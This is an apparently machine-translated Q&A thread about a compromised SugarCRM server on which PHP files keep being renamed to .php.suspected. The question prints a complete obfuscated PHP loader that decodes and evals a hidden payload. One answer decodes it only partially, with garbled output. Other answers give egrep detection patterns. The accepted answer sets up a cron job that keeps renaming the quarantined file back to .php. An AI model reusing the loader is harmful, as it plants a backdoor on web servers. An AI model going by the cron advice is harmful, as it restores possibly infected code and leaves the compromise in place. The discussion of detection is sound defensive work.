Php file is automatically renamed to php.suspected

Question

Php file is automatically renamed to php.suspected

Over the past 4 days, we have encountered a problem on our production server (an instance of AWS EC2) related to only one site, which is SugarCRM.

The problem /home/site_folder/public_html/include/MassUpdate.php is automatically renamed to the file /home/site_folder/public_html/include/MassUpdate.php.suspected

This happens 2-3 times a day with 3-4 hours of space. This problem occurs only in the case of a particular site, even if it does not occur to set up a replica of the same site. I even checked the code for this file from both sites, it does too.

We have Googled and found, such a problem occurs mainly for Wordpress sites, and this may be due to an attack. But we checked our server against attack, no. Also, the server does not scan viruses and malware.

What should we do?

Update: We found a few things after going through this link. We performed egrep -Rl 'function.*for.*strlen.*isset' /home/username/public_html/ and found that there are several files with the following code example.

  <?php function flnftovr($hkbfqecms, $bezzmczom){$ggy = ''; for($i=0; $i < strlen($hkbfqecms); $i++){$ggy .= isset($bezzmczom[$hkbfqecms[$i]]) ? $bezzmczom[$hkbfqecms[$i]] : $hkbfqecms[$i];} $ixo="base64_decode";return $ixo($ggy);} $s = 'DMtncCPWxODe8uC3hgP3OuEKx3hjR5dCy56kT6kmcJdkOBqtSZ91NMP1OuC3hgP3h3hjRamkT6kmcJdkOBqtSZ91NJV'. '0OuC0xJqvSMtKNtPXcJvt8369GZpsZpQWxOlzSMtrxCPjcJvkSZ96byjbZgtgbMtWhuCXbZlzHXCoCpCob'.'zxJd7Nultb4qthgtfNMtixo9phgCWbopsZ1X='; $koicev = Array('1'=>'n', '0'=>'4', '3'=>'y', '2'=>'8', '5'=>'E', '4'=>'H', '7'=>'j', '6'=>'w', '9'=>'g', '8'=>'J', 'A'=>'Y', 'C'=>'V', 'B'=>'3', 'E'=>'x', 'D'=>'Q', 'G'=>'M', 'F'=>'i', 'I'=>'P', 'H'=>'U', 'K'=>'v', 'J'=>'W', 'M'=>'G', 'L'=>'L', 'O'=>'X', 'N'=>'b', 'Q'=>'B', 'P'=>'9', 'S'=>'d', 'R'=>'I', 'U'=>'r', 'T'=>'O', 'W'=>'z', 'V'=>'F', 'Y'=>'q', 'X'=>'0', 'Z'=>'C', 'a'=>'D', 'c'=>'a', 'b'=>'K', 'e'=>'o', 'd'=>'5', 'g'=>'m', 'f'=>'h', 'i'=>'6', 'h'=>'c', 'k'=>'p', 'j'=>'s', 'm'=>'A', 'l'=>'R', 'o'=>'S', 'n'=>'u', 'q'=>'N', 'p'=>'k', 's'=>'7', 'r'=>'t', 'u'=>'2', 't'=>'l', 'w'=>'e', 'v'=>'1', 'y'=>'T', 'x'=>'Z', 'z'=>'f'); eval(flnftovr($s, $koicev));?>

Something seems to be malware, how do we permanently delete it?

thanks

+13

linux php apache amazon-ec2 sugarcrm

Amol chakane Sep 29 '15 at 4:39

source share

4 answers

This is somewhat confusing, but I de-fused it. The flnftovr function takes a string and an array as arguments. It creates a new line $ ggy using the formula

 isset($array[$string[$i]]) ? $array[$string[$i]] : $string[$i];}

Then it prepares base64_decode for the string.

The string is $ s, the array is $ koicev. Then he calculates the result of this manipulation. Therefore, in the end, a line is created:

 base64_decode(QGluaV9zZXQoJ2Vycm9yX2xvZycsIE5VTEwpOwpAaW5pX3NldCgnbG9nX2Vycm9ycycsIDApOwpAaW5pX3NldCgnbWF4X2V4ZWN1dGlvbl90aW1lJywgMCk7CkBzZXRfdGltZV9saW1pdCgwKTsKCmlmKGlzc2V0KCRfU0VSVkVSKfZW5jb2RlKHNlcmlhbGl6ZSgkcmVzKSk7Cn0=)

So, what actually runs on your server:

 @ini_set('error_log', NULL); @ini_set('log_errors', 0); @ini_set('max_execution_time', 0); @set_time_limit(0); if(isset($_SERVER) encode(serialize($res)); }

If you did not create this, and you suspect that your site has been hacked, I suggest that you erase the server and create a new installation of any applications running on your server.

+2

Alan apter Jun 29 '16 at 13:52

source share

Renaming .php files to .php.suspected continues to happen today. The following commands should not come up with something:

 find <web site root> -name '*.suspected' -print find <web site root> -name '.*.ico' -print

In my case, infected files can be detected using the following commands:

 cd <web site root> egrep -Rl '\$GLOBALS.*\\x' egrep -Rl -Ezo '/\*(\w+)\*/\s*@include\s*[^;]+;\s*/\*' egrep -Rl -E '^.+(\$_COOKIE|\$_POST).+eval.+$'

I prepared a more detailed description of the problem and how to deal with it on GitHub .

+1

Javier elices Nov 27 '18 at 17:20

source share

Renaming php files to php.suspected is usually intended and executed by a hacker script. They modify the file extension to give the impression that the file has been checked by some malware protection software, is safe and cannot be executed. But actually it is not. They change the extension to "php" anytime they want to call the script, and after that they change the extension back to "suspect". You can read about it at Securi Research Labs.

Maybe this post is old, but the theme is still alive. Especially in line with the June 2019 malware campaign targeting WordPress plugins . I found several “suspect” files in my WordPress client subdirectories (like wp-content)

0

Wojtek suszycki Jul 2 '19 at 13:34

source share

Amol chakane · Accepted Answer · 2018-05-30T06:51:20+0000

By posting this answer, it can help others.

Create a file with the extension .sh in a place convenient for you.
Add the following code to this.

#Rename your_file_name.php.suspected to your_file_name.php mv/<path_to_your_file>/your_file_name.php.suspected/<path_to_your_file>/your_file_name.php

Save this file.
Install cron for every 10 minutes (or any other interval you need) using the following line in crontab

*/10 * * * * path_to_cron_file.sh

Restart the crontab service.

You will get a lot of documentation on creating cron on Google.

Php file is automatically renamed to php.suspected

More articles: